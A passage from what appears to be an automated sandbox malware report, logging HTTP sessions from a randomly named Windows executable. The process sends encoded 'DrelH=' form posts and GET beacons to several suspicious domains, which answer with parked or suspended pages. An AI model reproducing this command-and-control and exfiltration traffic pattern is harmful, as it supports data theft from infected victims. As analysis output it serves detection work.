                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 34 2f 45 30 42 71 50 4b 71 59 78 4c 77 2b 39 39 39 63 57 78 73 59 37 2f 35 73 31 67 6c 4d 36 6b 33 65 63 31 50 73 65 4f 66 6e 31 65 32 53 31 2b 55 69 56 76 52 33 31 6f 53 70 31 39 45 4a 44 39 78 66 44 4a 41 48 45 70 46 78 6c 2b 75 77 73 48 30 2b 38 54 78 70 59 38 72 66 35 55 79 36 2f 2f 61 79 49 44 43 49 6c 50 4e 30 34 6d 71 37 72 45 46 70 59 64 51 59 57 43 37 62 49 77 4e 6b 73 42 6b 64 72 67 36 49 6c 36 7a 7a 54 4d 57 49 68 75 6f 73 77 66 32 41 6d 4a 64 77 63 70 31 32 6d 59 72 64 4f 63 72 47 6c 51 42 4b 35 34 4f 64 4e 48 65 4d 56 68 2f 4a 35 5a 39 54 2f 37 52 38 4d 55 6e 66 31 34 52 45 57 59 46 4b 62 78 62 75 79 4f 4d 32 49 61 37 30 4a 4d 47 61 33 32 42 6d 72 33 36 53 6b 45 68 71 56 68 51 78 74 6b 51 4e 31 59 56 6f 51 4a 66 69 66 50 57 44 59 6e 32 37 36 44 4b 75 59 69 31 54 4a 61 64 54 6a 67 4b 49 44 78 74 78 59 73 31 4f 6d 52 71 31 76 7a 5a 44 36 47 58 64 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJI4/E0BqPKqYxLw+999cWxsY7/5s1glM6k3ec1PseOfn1e2S1+UiVvR31oSp19EJD9xfDJAHEpFxl+uwsH0+8TxpY8rf5Uy6//ayIDCIlPN04mq7rEFpYdQYWC7bIwNksBkdrg6Il6zzTMWIhuoswf2AmJdwcp12mYrdOcrGlQBK54OdNHeMVh/J5Z9T/7R8MUnf14REWYFKbxbuyOM2Ia70JMGa32Bmr36SkEhqVhQxtkQN1YVoQJfifPWDYn276DKuYi1TJadTjgKIDxtxYs1OmRq1vzZD6GXdAOIykXD5uzvgvqu3C59vVu/eHo1+HQ7jFs2vG8lZOlDLfN/VuLLzC2cjwoxJO0UKMkKafYc2J50FyXqErCrELiMOIqIRdan7DP+e5AgnvIaE67wQBWbTgedsDt9M6dOqT8fps/dHxZQyRIgKBLU8PE9dJbUtgMFltsqZRTNCouZwY13Ojb14pnXFBOGiNmm8mhr9K///rnSj8qmWr2kE0bn2dmSMfYOuiB1/BqMCnf1p+3Rv1Scwq7UiLuuHWgFaG57rrm3D7VXIOUTLbrP6JXR3Hh68jbtdIQWp0DmT6XHXRvx7FeIDsNdQA0BrTaDuQSiYfDPQX5Vu/t/fFGtpAQ0T/mlTYczMukEem2GV0XFBHbIVa1UKVBryBTfSPx64ev5Q2iHQdsyxjvAF6vphIvKpd2hqr7gG3hVx7XcVP9poi0Nd30kFXjwCWKmKYaws0doNYbepEqkbRfzEbtw7HdjyYnr4BbVs+T7/Ox7kSEklja7qhAZa9M6YNJo64KjFWHDLM4bGThr42iMJNy6CkKoUtESYSFQT8acP6dci7R9ITNDJg44p86Y8BoFzbEWygL+C16FDVRbfQmVU3cP/pvNOmOYDrtc5ZgclWLdDNXsqCUdGOtO+IaKDK0Rqu5uwvTRDKcuBZ1b3OTJKXWX15xPPXsHhh8A5NV [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:57:55.072618961 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:54 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.553223217.70.184.50801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:56.792296886 CEST480OUTGET /0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw== HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:57:57.606309891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:57 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Vary: Accept-Language
                                                                                                                                  Data Raw: 37 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                  Data Ascii: 779<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>stocksm.fun</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whoi [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:57:57.606339931 CEST878INData Raw: 73 6d 2e 66 75 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61
                                                                                                                                  Data Ascii: sm.fun"><strong>View the WHOIS results of stocksm.fun</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-bord


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.55322494.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:02.789788008 CEST750OUTPOST /v2k8/ HTTP/1.1
                                                                                                                                  Host: www.drevohome.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.drevohome.shop
                                                                                                                                  Referer: http://www.drevohome.shop/v2k8/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 7a 4f 30 72 55 75 37 35 72 57 69 62 42 76 76 2f 64 38 4b 76 79 62 6e 49 45 5a 5a 74 55 31 38 47 76 33 35 4f 34 53 6e 33 59 70 49 58 74 44 37 5a 43 69 36 56 34 4f 30 33 34 42 47 4b 79 46 48 72 35 61 4f 6b 75 77 42 51 30 71 4c 41 42 78 6f 49 62 4c 59 71 75 4f 77 44 61 46 2f 63 51 42 38 61 65 6d 41 48 48 45 56 46 75 71 2b 38 74 33 75 6c 43 41 67 77 36 4d 55 78 56 58 36 6b 77 6b 47 41 52 70 78 4a 6e 61 5a 78 30 56 33 68 34 78 48 74 4a 52 4c 75 41 46 68 72 54 55 6d 62 69 30 74 76 61 42 2b 70 57 4b 53 57 43 61 79 31 55 63 57 37 4f 7a 50 6c 31 2b 2b 79 55 75 45 3d
                                                                                                                                  Data Ascii: DrelH=aRJkG/xjeaxIzO0rUu75rWibBvv/d8KvybnIEZZtU18Gv35O4Sn3YpIXtD7ZCi6V4O034BGKyFHr5aOkuwBQ0qLABxoIbLYquOwDaF/cQB8aemAHHEVFuq+8t3ulCAgw6MUxVX6kwkGARpxJnaZx0V3h4xHtJRLuAFhrTUmbi0tvaB+pWKSWCay1UcW7OzPl1++yUuE=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  22192.168.2.55322594.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:05.326951027 CEST770OUTPOST /v2k8/ HTTP/1.1
                                                                                                                                  Host: www.drevohome.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.drevohome.shop
                                                                                                                                  Referer: http://www.drevohome.shop/v2k8/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 49 47 76 54 78 4f 35 57 54 33 62 70 49 58 31 54 37 6d 4d 43 37 62 34 4f 34 4a 34 45 2b 4b 79 46 54 72 35 62 2b 6b 75 6e 74 50 31 36 4c 4f 48 78 6f 4f 52 72 59 71 75 4f 77 44 61 46 72 32 51 42 30 61 65 57 77 48 56 6c 56 4b 6f 61 2b 2f 37 48 75 6c 47 41 67 30 36 4d 55 54 56 54 36 65 77 6d 75 41 52 72 70 4a 70 72 5a 79 2b 56 33 6e 32 52 47 61 41 54 36 63 5a 47 77 6b 62 69 7a 54 35 6d 70 33 53 58 54 44 4d 6f 61 2b 52 36 65 4e 45 50 65 4d 66 44 75 4d 76 64 75 43 4b 35 53 65 42 71 51 6d 37 76 57 74 78 45 37 57 55 4d 6b 42 32 4a 42 75
                                                                                                                                  Data Ascii: DrelH=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHIGvTxO5WT3bpIX1T7mMC7b4O4J4E+KyFTr5b+kuntP16LOHxoORrYquOwDaFr2QB0aeWwHVlVKoa+/7HulGAg06MUTVT6ewmuARrpJprZy+V3n2RGaAT6cZGwkbizT5mp3SXTDMoa+R6eNEPeMfDuMvduCK5SeBqQm7vWtxE7WUMkB2JBu


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  23192.168.2.55322694.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:07.880064011 CEST1787OUTPOST /v2k8/ HTTP/1.1
                                                                                                                                  Host: www.drevohome.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.drevohome.shop
                                                                                                                                  Referer: http://www.drevohome.shop/v2k8/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 51 47 76 68 70 4f 34 78 50 33 61 70 49 58 72 44 37 6a 4d 43 36 48 34 4b 55 56 34 45 43 77 79 47 72 72 34 35 32 6b 35 43 5a 50 37 36 4c 4f 4b 52 6f 4c 62 4c 59 37 75 4b 73 48 61 46 37 32 51 42 30 61 65 55 6f 48 51 45 56 4b 71 61 2b 38 74 33 75 70 43 41 68 68 36 4d 4e 73 56 54 33 70 7a 58 4f 41 52 4c 35 4a 72 5a 78 79 6b 56 33 6c 31 52 47 43 41 54 32 48 5a 47 74 62 62 69 76 35 35 6b 35 33 44 78 2b 37 65 4c 71 6f 48 62 57 79 47 75 47 2f 48 55 71 69 74 4b 44 30 41 36 47 5a 41 5a 30 4b 77 49 2b 78 30 6d 79 37 56 4c 6f 6d 67 76 6b 41 6d 45 34 79 4e 50 65 35 39 59 6e 4a 73 4e 39 46 2b 52 65 32 6d 35 68 4f 64 39 66 67 31 59 51 36 75 6f 44 67 73 4c 6c 62 79 75 50 4c 6e 39 73 64 35 6f 54 2b 32 68 58 57 69 76 49 36 33 58 76 77 4e 71 4c 57 32 65 34 4c 4c 36 42 34 31 53 77 32 57 6c 4c 79 66 38 50 6f 5a 45 6a 68 74 71 69 74 48 65 50 63 4c 79 62 49 79 78 4d 69 6a 69 31 75 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHQGvhpO4xP3apIXrD7jMC6H4KUV4ECwyGrr452k5CZP76LOKRoLbLY7uKsHaF72QB0aeUoHQEVKqa+8t3upCAhh6MNsVT3pzXOARL5JrZxykV3l1RGCAT2HZGtbbiv55k53Dx+7eLqoHbWyGuG/HUqitKD0A6GZAZ0KwI+x0my7VLomgvkAmE4yNPe59YnJsN9F+Re2m5hOd9fg1YQ6uoDgsLlbyuPLn9sd5oT+2hXWivI63XvwNqLW2e4LL6B41Sw2WlLyf8PoZEjhtqitHePcLybIyxMiji1uWj4c+gb246jVWQeIL7sfdlkZZAU1tC4U5ml1xVwUppCHR3IcMJqp3JO+YSaV3iRcpLRQ9He2U8KXaiHtSP4KLNaMWsjBM6eQSNYTzPU0uqY8OuxDM70cSCoI+6oPIWfF+It0T/3LVOOSB/hKd4rQKHG1yY8Nog3OgMStqjgAnvpNtEiOViQkX52i9e/aXk1z4UidU07SVQr07v8UuV1QGBmwsexarHnL5ksJQZfrNV7+TTsZoxzIJugbwbrvi+vSBDkieNdjYKVAirZ3qv+usDfuv2DqS7FhnSEITIjkFPJadP01LDCUvpt/5kku88XKFY2FZqVrdQMwVpwO9lUFtlfyk2fL819pWx4PsGCDCr9K/m3mROYnzi6SZqN+NRD8+NDjzVfNq7TlM8NyQuB+J6zX4EgBVj558AQ+VPTJ8RlwTSMJ3jm4oLs/YVkJFDa8se/H7skFB5GmH84EDVdBEe4MvopijgxVqQx7c3UHIbufglP1TWtWcrWqtyIxpY3w8VHU8oYEUSnBWiOFMXGbqx26KljzlCgY+n5lYBRvRnJtKmE3QuGn8+dqmfZqAQR5VEkVT4KijMplLbFg297IbKqoh8Q5rMU3SvJaLHUbBRLHM3KSByAaUQ36OQTXFqccrL/t13YUF35f5IstVWfxw5TDI+QDgudNyR [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  24192.168.2.55322794.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:10.417376995 CEST483OUTGET /v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.drevohome.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:58:11.229274035 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 22 Oct 2024 20:58:11 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 7468
                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "606f145e-1d2c"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                                  Oct 22, 2024 22:58:11.229335070 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                                  Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                                  Oct 22, 2024 22:58:11.229372978 CEST1236INData Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                                  Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                                  Oct 22, 2024 22:58:11.229408979 CEST1236INData Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
                                                                                                                                  Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
                                                                                                                                  Oct 22, 2024 22:58:11.229445934 CEST1236INData Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
                                                                                                                                  Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
                                                                                                                                  Oct 22, 2024 22:58:11.229480982 CEST1236INData Raw: 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 72 65 73 6f 75 72 63 65 73 2f 70 61 67 65 73 2f 6e 6f 6e 2d 72 65 73 70 6f 6e 73 65 2d 32 30 31 34 2d 30 31 2d 32 39 2d 65 6e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 0d 0a 09 09 09 09 3c 70 3e 3c 73 70 61 6e
                                                                                                                                  Data Ascii: //www.icann.org/resources/pages/non-response-2014-01-29-en</a></p><p><span class="bold">How can I prevent deactivation of my domain in the future?</span><br>This requires the completion of the verification process within 15 days
                                                                                                                                  Oct 22, 2024 22:58:11.229517937 CEST296INData Raw: 63 61 6e 20 49 20 64 6f 3f 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09 09 09 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 74 6f 20 74 68 69 73 20 77 65 62 73 69 74 65 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 63 63 65 73 73 69
                                                                                                                                  Data Ascii: can I do?</span><br>If you are a visitor to this website, please try accessing this domain again later.</p></div>.../slice_content--></div>.../slice--></div>.../col-sm-8--></div>.../row--><footer><a href="legal


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  25192.168.2.553228103.224.182.242801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:16.684567928 CEST759OUTPOST /1juc/ HTTP/1.1
                                                                                                                                  Host: www.givingaway123.net
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.givingaway123.net
                                                                                                                                  Referer: http://www.givingaway123.net/1juc/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
